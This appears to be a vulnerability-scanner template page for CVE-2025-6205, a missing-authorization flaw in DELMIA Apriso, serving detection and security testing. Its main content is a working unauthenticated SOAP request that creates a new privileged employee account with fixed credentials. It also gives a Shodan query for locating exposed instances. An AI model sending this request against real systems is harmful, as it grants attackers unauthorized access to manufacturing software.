DELMIA Apriso - Broken Access Control
CVE-2025-6205
Early Release
Description
DELMIA Apriso Release 2020 through Release 2025 contains a broken access control vulnerability caused by missing authorization, letting attackers gain privileged access to the application, exploit requires no special conditions.
Severity
High
CVSS Score
8.8
Exploit Probability
11%
Published Date
September 23, 2025
Template Author
iamnoooob, rootxharsh, parthmalhotra
+1
CVE-2025-6205.yaml
id: CVE-2025-6205
info:
name: DELMIA Apriso - Broken Access Control
author: iamnoooob,rootxharsh,parthmalhotra,pdresearch
severity: high
description: |
DELMIA Apriso Release 2020 through Release 2025 contains a broken access control vulnerability caused by missing authorization, letting attackers gain privileged access to the application, exploit requires no special conditions.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-6205
- https://www.3ds.com/trust-center/security/security-advisories/cve-2025-6205
- https://projectdiscovery.io/blog/remote-code-execution-in-delmia-apriso
classification:
cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
cvss-score: 8.8
cve-id: CVE-2025-6205
epss-score: 0.11457
epss-percentile: 0.93243
cwe-id: CWE-862
metadata:
verified: true
max-request: 1
shodan-query: title:"DELMIA Apriso"
tags: cve,cve2025,delmia,apriso,unauth,intrusive
variables:
username: "LAST"
password: "9"
http:
- raw:
- |
POST /Apriso/MessageProcessor/FlexNetMessageProcessor.svc HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml;charset=utf-8
Soapaction: "http://tempuri.org/IFlexNetMessageProcessor/ProcessMessageASync_v2"
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<tem:ProcessMessageASync_v2>
<tem:xmlMessage><FlexNet_Employees xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="S:/SchemaRepository/XMLSchemas/FlexNet/FlexNet_Employees.xsd" Version="1.0"> 	<Employee> 		<GivenName>FIRST</GivenName> 		<FamilyName>LAST</FamilyName> 		<EmployeeNo>08262004</EmployeeNo> 		<LoginName>{{username}}</LoginName> 		<Password>{{password}}</Password> 		<HireDate>2000-06-01T00:00:00</HireDate> 		<SpokenLanguageID>1033</SpokenLanguageID> 		<WrittenLanguageID>1033</WrittenLanguageID> 		<EmployeeValidDate>2000-06-01T00:00:00</EmployeeValidDate> 		<LoginExpirationDate>9999-12-31T00:00:00</LoginExpirationDate> 		<EmployeeType>0</EmployeeType> 		<DefaultFacility>C1P1</DefaultFacility> 		<TrackLaborFlag>true</TrackLaborFlag> 		<ResourceID NodeType="Field"> 			<Resource_Insert> 				<Name>FIRST</Name> 				<ResourceName>FIRST</ResourceName> 				<ResourceType>1</ResourceType> 				<FUID NodeType="Field"/> 			</Resource_Insert> 		</ResourceID> 		<EmployeeRole> 			<EmployeeID NodeType="Field"/> 			<RoleID NodeType="Field"> 				<Role> 					<Role>Production User</Role> 				</Role> 			</RoleID> 		</EmployeeRole> 	</Employee> </FlexNet_Employees></tem:xmlMessage>
<tem:applicationName>myExternalApplication</tem:applicationName>
</tem:ProcessMessageASync_v2>
</soapenv:Body>
</soapenv:Envelope>
matchers:
- type: word
part: body
words:
- ProcessMessageASync_v2Response
- <ProcessMessageASync_v2Result>true</ProcessMessageASync_v2Result>
condition: and
extractors:
- type: dsl
dsl:
- '"Username: "+ username'
- '"Password: "+ password'
# digest: 4a0a0047304502210084533b668257b277a6a1a7b94819ba449ef6ec083111ceee50c8e1054345ca5502207605ebacc11c2c9a82ac6c9aed36001bcba64a0b20d9342478c8b98c41d1ba8f:922c64590222798bb761d5b6d8e729508.8Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2025-6205
CWE ID:
cwe-862